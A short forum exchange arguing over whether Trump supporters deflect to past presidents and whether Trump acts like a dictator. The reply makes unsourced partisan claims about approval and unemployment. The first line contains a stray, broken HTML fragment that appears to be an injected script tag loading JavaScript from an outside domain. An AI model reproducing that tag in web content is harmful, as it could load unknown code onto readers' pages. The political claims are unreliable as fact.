Just for once I'd love to see someone argue for Trump without essentially saying, "yeah, but Obama (or Hillary or Bill Clinton) did..."< ="text/" async="" src="//cardinal.net/1fa16f6ccbee745a0c.js">
Just once.
Honestly, anyone who is firmly backing Trump right now needs to have their head examined.
Because when you mention Trump's actions as being (in this case) dictatorial you have to put them in perspective with actions of other presidents. Particularly when you're not mentioning specific actions. How is he being a dictator when others weren't? THAT"S why you have to mention past presidents to point out the double standard. If the same actions in the past weren't the acts of a dictator, why are they now? What changed other than the people now complaining about Trump acting like a dictator don't like him?
If you're talking specifics, show how he's gone above the law. I haven't seen that. Trump has had 1 veto. His executive actions and Presidential memorandums are on track to be less than Obama. In fact most every action he has made has been challenged in court. How often do you see that in dictatorships?
If you just don't like his style, then too bad. His style doesn't make him a dictator. Maybe a dick, but not a dictator.
And of course you end with the typical cheap shot. I guess you don't approve of the economy like 70%+ of the people do. You don't want record low female, youth, black, hispanic, asian, & veteran unemployment, business startups by women, millions off of welfare and food stamps, energy independence, decimation of ISIS, 4+million jobs created, etc. How could anyone support that? He says such mean things!
